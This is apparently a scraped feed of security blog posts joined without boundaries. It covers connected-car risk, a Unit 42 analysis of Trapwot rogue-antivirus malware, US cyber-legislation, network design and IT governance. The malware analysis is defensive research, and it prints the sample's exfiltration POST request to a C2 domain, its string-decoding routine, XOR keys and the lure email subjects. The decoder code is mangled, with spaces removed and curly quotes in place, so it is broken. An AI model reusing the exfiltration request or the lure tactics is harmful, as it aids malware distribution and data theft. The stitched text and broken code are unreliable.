There is a revolution taking place in the automotive industry that will affect nearly every car owner, driver and passenger. It is the introduction of connected cars and the promise of enhanced safety and convenience.
With that promise comes massive security and privacy risk. After all, cars will be operated by highly intelligent computing devices that can be accessed remotely. Driver override will be built-in, but malicious tampering is possible. And in this case, there is absolutely no margin for error.
Having connected cars is fantastic and is the way the industry and society have been progressing, but not without questioning the concept and not without the assurance that the system cannot be compromised. It is critical that we ensure customers that a hacker cannot take over operation of the vehicle. And so far, it has been proven that this is possible today.
The benefits can go from having metrics about your driving style to preventing an accident. For example, a connected car can know the best route and where gas stations or restaurants are located. Although you could have these tools on other devices, the real value comes from optimizing fuel consumption and providing the best advice on how to drive safely and even taking control (with the right parameters in place), if necessary. A connected car is, or can be, intelligent, autonomous and smart.
The safety benefits of connected cars are very clear. A driver can be located in a dangerous situation, the car can be traced if stolen and the vehicle could potentially be locked if the driver is not the approved one. On the other hand, we need to understand that we are talking about identity management, authenticity and accountability. We need to understand that data can potentially be used against us if we do something wrong while driving.
As a potential user of a connected car, I would first ask what is really at stake. I would think about all the “what if” scenarios so I could fully understand the different roles the car will play in terms of advice, taking control, providing information and collecting information. Let me emphasize the importance of not only being a driving aid (which is at the core of a connected car), but that it also collects and potentially shares information about driving behaviors. I would try to clearly understand all aspects of privacy when purchasing a car that will “learn” a great amount of information about me.
Protecting user information is critical, both technical and legal. In terms of technical protection, vendors need to ensure that the system is robust and solid, that it has been hardened and that it is impossible to access it from places other than the “guaranteed” ones. If we consider a system that cannot be accessed remotely and does not allow a third party to take control of the car, that would make the vehicle less connected—which is something that we do not want. Thus, we have to ensure that the proper communication channels have been established. For this, vendors must be certain that the technology they deploy is safe and bug-free. On the legal side, a driver will have to agree with the collection and sharing of personal information. That is something that can fundamentally change and challenge our approach to driving.
It has been proven that hackers can take control of some models of electric cars. Remember, there’s a computer inside the car, standard protocols to connect to the Internet and operating systems that might have some flaws. Millions of cars provide a good customer base for the bad guys to try. And, while that may not make the bad guys money, it will certainly be something governments must monitor since a terrorist attack on thousands of vehicles would have a massive impact on society.
As with previous advances in technology, our prediction is that the market for connected cars will expand and change very rapidly. As a society, we will have to look at the legal ramifications and accept the sharing of data. If we accept that, we accept things such as the car taking control in heavy traffic. Sometimes we are pushed by technology that we do not really understand, but that is nice for us to use. We believe that focusing only on the benefits is short-sighted and we always appreciate the risk assessment approach—understanding what is at stake and if the benefits outweigh the risks or not.
Integrity is key in every security program, and even more so with connected cars. Making sure that the information is correct, and that it has not been altered by a third party is critical to success. A connected car, and the way it collects and correlates information, will be transparent for the user, much like a black box on a plane. Integrity is fundamental so that we know that data is the original and reliable. This is one of the key aspects of the validity of the information of a connected car.
Ramses Gallego
Security strategist and evangelist, Dell Software
ISACA International Vice President
In recent weeks, Unit 42 has been monitoring a new e-mail campaign distributing the Trapwot malware family. The Trapwot malware family is considered “scareware” or “rogue antivirus” because it attempts to mislead victims into believing their machine is infected with malware. It disguises itself as an anti-virus product, and attempts to encourage users into purchasing a non-existent protection.
In total, our AutoFocus threat intelligence service has collected 380,000 emails carrying Trapwot in the past 30 days. These 380,000 e-mails have contained over 5,400 unique malware samples. These attacks have primarily targeted the insurance, higher education, and healthcare industries.
Trapwot is just one of many variants of Rogue Antivirus programs that currently plague users. Readers should be skeptical of pop-ups that suggest their system is infected with malware and ask them to purchase a new product. As always, users should also avoid opening attachments delivered over e-mail that they are not expecting, no matter how enticing the content may be.
Malware Distribution and Targets
The attackers behind Trapwot are distributing it via e-mail, likely through a spam botnet. The following world map demonstrates the distributed nature of the origin of these emails.
Figure 1. Trapwot Source Countries Shown in AutoFocus
Figure 2. Trapwot E-mail Timeline in AutoFocus
Executables with a filename suffix of ‘.scr’ were attached to emails distributed in this campaign. Filenames varied, however, they typically were formatted in one of the following ways:
DOC_[random_numbers]-PDF.scr
PIC[random_numbers]-JPG.scr
Subjects for these emails varied as well. For emails sent with the ‘DOC_’ attachment names, the following subjects were seen.
Read as soon as possible
Document #87
Order #371
Your order #624
Important
Additionally, for emails sent with the ‘PIC’ attachment names, the following subjects were seen.
Pretty or ugly?
Should I upload this picture on facebook?
My private photo for you
Do you think I’m attractive?
Check out this picture
The spam email itself largely targeted the insurance and higher education industries, with roughly 120,000 and 93,000 emails received respectively. (Please note that the 120,000 number for insurance is slightly misleading as all but 1,600 of those emails were received by a single, large insurance company.)
The healthcare industry has also seen roughly 31,000 emails carrying Trapwot.
Figure 3. Trapwot Targeted Industries in AutoFocus
Overall, the malware is primarily seen targeting the United States. However, the high number of samples targeting the large insurance provider likely account for this. As we can see in the diagram below, this malware is being distributed to many countries across the globe.
Figure 4. Trapwot Destination Countries Shown in AutoFocus
Stage One Downloader
In the event an unsuspecting user were to open one of the attached executable files, the malware would download a remote executable file to the victim’s machine prior to executing it.
A number of obfuscated strings are encountered within the stage one downloader. The following function is used to decode these strings:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def decode(str):
out=“”
forxinstr:
o=ord(x)
ifo<=109andx.isalpha()andx.islower():
out+=chr(o+13)
elifo<=77andx.isalpha()andx.isupper():
out+=chr(o+13)
elifo>=110andx.isalpha()andx.islower():
out+=chr(o–13)
elifo>=78andx.isalpha()andx.isupper():
out+=chr(o–13)
else:
out+=x
returnout
Please refer to this IDAPython script that may be used to automatically decrypt strings encountered in the stage one downloader. These decoded strings are used to both load functions and libraries dynamically, as well as to obfuscate the URLs embedded within the malware. The following URLs were discovered in this sample.
The second stage is downloaded using a minimalistic HTTP request, as we can see below.
Figure 5. Stage One Downloader HTTP Request
The user-agents witnessed in this campaign demonstrate a sense of immaturity on the attacker’s part. Other user-agents witnessed include the following:
wutz0r
supz0r
jackpot
cashmayne
cash
letsgo
faggots
checkin
kash
suckmyballz
Once downloaded, the file is written to %TEMP%\winmgr.exe. It is then executed using a call to the CreateProcessA function. Finally, the malware displays a message box with the following text.
Title: Microsoft Photo Viewer
Message: windrcs32.dll cannot be found.
This sample had the original filename of ‘PIC9811322311-JPG.scr,’ which explains why the message box has the title of ‘Microsoft Photo Viewer.’
Stage Two Downloader and Trapwot
When the stage two payload is executed, the malware begins by decrypting embedded URLs within the file using a single-byte XOR key of 0x65. Once decrypted, the following domains were discovered in this particular sample:
updatemarketltd[.]in
mastertodayversion[.]eu
Stage two proceeds to check the current time and make a comparison against a statically set time. In the event the current time is later than this time, no malicious activity will occur.
Figure 6. Stage Two Kill Timer
In addition to the single-byte XOR string encryption, the stage two downloader also encrypts a number of strings using the XXTEA encryption algorithm. The following static key, represented in hexadecimal notation, is used to decrypt these embedded encrypted strings.
The malware proceeds to collect the following information from the victim machine. This information will be exfiltrated when the sample downloads Trapwot shortly.
Microsoft Windows Operating System Version
Operating System Language
Malware Install Path
Default Web Browser
Malware Process Integrity Level
Once this data has been collected, the malware will attempt to send the following POST request.
POST /a/offers?i=0&u=548621bc51c9415ebaba30e0a9c1d8bb&f=1&v=21&a=119 HTTP/1.1
Host: mastertodayversion[.]eu
Content-Length: 69
Cache-Control: no-cache
[binary content]
In the above request, there are four GET parameters. The following parameters have been identified:
i : Incrementing counter
u : Victim machine GUID
f : Static value. Potentially indicates version of malware
a : Integer generated using byte one and byte two of the executable’s PE timestamp
The following example binary content is sent in this POST request.
00000000 b0 a1 a5 a5 95 a5 a5 b7 a1 a5 a3 a4 14 b8 b6 a7 |…………….|
00000010 a5 ac a1 b3 81 a5 e6 9f f9 f0 d6 c0 d7 d6 f9 e4 |…………….|
00000020 c1 c8 cc cb cc d6 d1 d7 c4 d1 ca d7 f9 c8 c9 d2 |…………….|
00000030 d7 fa d6 c8 d5 c9 8b c0 dd c0 b1 ad a5 cc c0 dd |…………….|
00000040 d5 c9 ca d7 c0 |…..|
This binary data is first encrypted using a single-byte XOR key of 0xA5. The underlying data has the following structure.
Figure 7. Victim Information Data Structure
This data includes the previously gathered victim information. Please refer to this provided Python script that can be used to decrypt and parse this data.
Should the remote server be active, it will respond with binary content that includes an encrypted DLL file. This binary content has the following structure.
Figure 8. Trapwot Downloaded DLL Structure
This DLL is encrypted and written to disk. Finally, the stage two downloader will identify the DLL’s EntryPoint prior to calling this function.
This DLL contains the actual Trapwot malware itself, which is responsible for spawning a fake anti-virus scanner and encouraging victims to buy the phony product, as seen below. Additionally, the malware may block access to legitimate websites and/or websites belonging to legitimate anti-virus vendors.
Figure 9. False ‘Security Defender’ Scanner
Figure 10. False ‘Action Center’ Display
Figure 11. False Virus Detection Alert
Figure 12. Trapwot False Purchase Page
Conclusion
Overall, Trapwot is not an especially new malware family, as it dates back to early November 2014. However, the malware is certainly dangerous as it can hinder performance and functionality on an infected machine. Palo Alto Networks AutoFocus platform enabled Unit 42 to identify and track this campaign, which accounted for hundreds of thousands of emails. This particular campaign targeted a large number of clients in the previous weeks.
Readers should be skeptical of pop-ups that suggest their system is infected with malware and ask them to purchase a new product. As always, users should also avoid opening attachments delivered over e-mail that they are not expecting, no matter how enticing the content may be.
News over the past year has focused the world’s attention on issues surrounding cybersecurity—notably that cyber attacks emerged as a top technology risk in the World Economic Forum’s Global Risks 2015 report. In April, US President Barack Obama declared cybercrime a national emergency and signed an executive order authorizing new sanctions against individuals and groups deemed responsible for cyberattacks.
The attention resonated with consumers, business leaders and legislators alike.
Mixed together with news of the Sony Corporation breach and other retail hacking occurrences, awareness of the need for increased cybersecurity focus has been at a high level. Now there is even more—but this time the news is about the US House of Representatives passage of two cybersecurity information sharing bills: Protecting Cyber Networks Act (PCNA) and National Cybersecurity Protection Advancement (NCPA) Act.
PCNA aims to defend against cyberattacks through the creation of a framework for the voluntary sharing of cyber threat information between private entities and the federal government. Importantly, it includes liability protection for those companies who choose to participate.
NCPA is similar to PCNA, with the distinction being that it encourages voluntary information sharing about cyber threats between the private sector and the Department of Homeland Security.
To help cybersecurity professionals understand the importance of these two new acts, ISACA has added a new CSX Special Reportto its Cybersecurity Legislation Watch center as part of its Cybersecurity Nexus (CSX). I encourage you to take a look at the report to better understand the two acts and what this new legislation could mean for you in your role and for your enterprise.
For professionals in the cybersecurity profession the implication is crystal clear. The general business community is more aware of the challenges, and those charged with protecting their organizations from attack must be highly aware and trained, including being knowledgeable of evolving legislation, such as this.
Keeping current and positioning your organization to best take advantage of the evolving regulatory landscape is of utmost importance in today’s fast-moving cybersecurity environment. This is not a time to be caught flat-footed.
Douglas Rausch, CISSP
President, Aurora CyberSecurity Consultants, Inc.
Networking is fun. It should also be pragmatic. The goal should be to get traffic from Point A to Point B as efficiently and securely as possible.
There are many networks in production that have been architected like a service provider network, or how networking companies want them designed. This is not to say that these networks aren’t providing service, as they all are, just not likely with the scaling requirements of an ISP. These designs are likely implemented by people who love networking and just want to see as much of it as possible, at the expense of being impractical and expensive.
Here’s an example of what I’ve described:
The architecture above contains:
Border Routers that connect to the Internet and are the first hop for the IPs provided by the ISP
Core Routers or Switches that handle routing between internal networks
Distribution Routers or Switches that aggregate Access Switches. They will either pass traffic between locally connected access switches or forward traffic to the core to be routed
Access Switches that provide physical Ethernet connectivity for endpoints (clients and servers)
Security Gateways that may include multiple layers of firewalls, Network IPS, Web Gateways, and Email Gateways
There are usually a few other erroneous network elements; routers to connect to partner networks, proxy servers, VPN concentrators, and legacy environments that people are reluctant to make changes to because they have been in place for years.
While highly scalable, for most enterprises (outside of ISPs) an environment like this is too much; like putting out a match with a fire hose.
Due to its complexity, this architecture would have a high capex and operational cost, as well as many potential points of failure. The most serious problem with this design though is its blind spots and lack of visibility. Specifically, because much of the internal traffic would travel from an endpoint, to a switch, then to another switch without hitting the security gateways it cannot be scrutinized. This is troubling from a security perspective as it’s estimated that during most network breaches the attacker makes six lateral movements once inside the network environment. The attacker makes these lateral moves in order to find the data they want, and then find an exit point. This lateral movement needs to be accounted for in any network security policy.
For better management and security, much of the functionality presented above should be collapsed into much fewer layers.
Firewalls
Access/Distribution Switches
In this architecture, the Internet connection would terminate at security gateways. In order to ensure a high-availability Internet connection, it is recommended that the firewalls each have two cable connections to the ISP (two connections to different ISPs is also possible). If necessary we implement dynamic routing protocols like BGP for high availability or OSPF for MPLS across the WAN interfaces of the security gateways. Threat modules should be enabled on the security gateways to perform network intrusion prevention and malware prevention. All site-to-site and client based VPNs should terminate at the security appliances, too.
Policy switches should connect to the security gateways inside interfaces as much as possible with as few other switch hops as possible. The switches should be configured in layer 2 mode only, and all layer 3 VLANs should terminate at the security gateways. This allows traffic to be routed from the access switches up to the security gateways so that security policy is applied to as much internal traffic as possible. If the number of access switches required outnumbers the ports on the security gateway, then distribution switches must be introduced to aggregate the physical access switch uplinks, as depicted in the diagram above. The distribution switches will then have trunks connecting to the security gateways.
With a next generation security platform, access control and security change dramatically. For example, imagine the simple scenario of IT engineers needing access to the servers to keep things running. If there are only VLANs between the LAN network and the server network, then there is no real room for access control. Anyone can move between these two networks as long as they have credentials.
However, if there were a firewall between these networks, a policy would need to be implemented. Each engineer upon joining the organization will need to request a static IP address, which takes time. From there they request access into the server network from that static IP address. The firewall team will update the policy with the new users source IP address and the destinations will likely be a long list of IP addresses and TCP and UDP services. The challenges here are that anyone can take that static IP and assign it to their computer. It also means that the administrator is restricted to a certain physical location (wherever their endpoint is located) when they access the server. Finally as people leave the organization the policy is never updated and becomes unruly.
In this same environment a much simpler and secure policy could be enabled. The source of the management traffic could be looking at the Active Directory user group for the IT engineers rather than (or in addition to) a static IP address. As soon as a new engineer is added or removed from Active Directory their access across the network is also added or removed. Rather than using ports and protocols that can be abused by malicious actors, the actual applications required (RDP, SSH) can be allowed and everything else will be blocked. And finally, by enabling network intrusion prevention and anti-malware, any malicious behavior can be prevented.
In summary, these are the benefits to this design:
Capital cost savings – We have eliminated at least three layers of physical appliances. While the cost of individual security gateways may increase due to their larger capacity, there is still cost savings of approximately 50 percent on overall equipment costs due to the reduction in hardware.
Operational cost savings – The complex routing and filtering is now being done on a single security gateway (or HA pair). Most daily modifications and troubleshooting will occur on a single pair of devices. The switches can all be in simple layer 2 mode. This means fewer devices need to be examined when there’s a problem, which saves time. Because the operational team will be spending most of their time in the security appliances, they will quickly develop stronger security skills which will also reduce the time taken to make repairs. There will be additional operations savings as less rack space, power, and cooling are required.
Better security – The more traffic that we route on an internal core network, the less traffic will be visible to the security gateways. By putting the default gateway for all networks on the security gateway, traffic between those networks will be scrutinized.
With the increase in the use of virtual machines in modern datacenters, it is important to ensure that the security platform you select can be deployed in virtual and public cloud environments to provide continuity.
Complexity and obscurity are the real enemies of security and availability. Simplicity and efficiency are key allies.
Governance is vital to accomplishing the goals of an enterprise. By its very definition, governance of enterprise IT (GEIT) places a structure around how an organization aligns IT strategy with business strategy, ensuring that companies stay on track to achieve goals and implement methods to measure performance.
To be successful, an enterprise needs to manage expectations and satisfy stakeholder requirements— the drivers behind development of enterprise goals and subsequent IT-related goals. These goals must be in alignment and are best created with the full cooperation and involvement of IT and the stakeholders.
While governance is critical to any enterprise, form does not always follow function, resulting in many different pathways to successful implementation. In short, there seems to be no agreed-upon approach.
How to you get there—how do you start?
One valuable new resource is ISACA’s white paper, “Getting Started with GEIT.” The white paper outlines how an enterprise can begin the process of understanding needs and how to take that knowledge and put it into action.
It summarizes how using a well-established framework, such as COBIT 5, assists in creating a common language and understanding of governance concepts throughout the enterprise.
For example, the early benefits of using a framework include:
Deliver value to stakeholders.
Accomplish established stakeholder goals.
Make future change easier to accomplish.
Establish a framework that is part of the enterprise culture.
Strengthen internal control.
Rely less on external parties.
Enhance credibility of internal resources.
One item to note is that no matter what new framework is introduced, the timing of its introduction should be sensitive to the general business environment or commitment to its adoption could prove difficult.
The beauty of a successful framework is that its strength resides in its flexibility. It offers guidance, not prescriptive steps in what to do. The end result? Risks to the enterprise are significantly reduced and overall value quickly recognized.
Joanne De Palma, CISM, BCMM Assessor, MBA
Director, Global Information Technology Risk Management – ORM
PFI
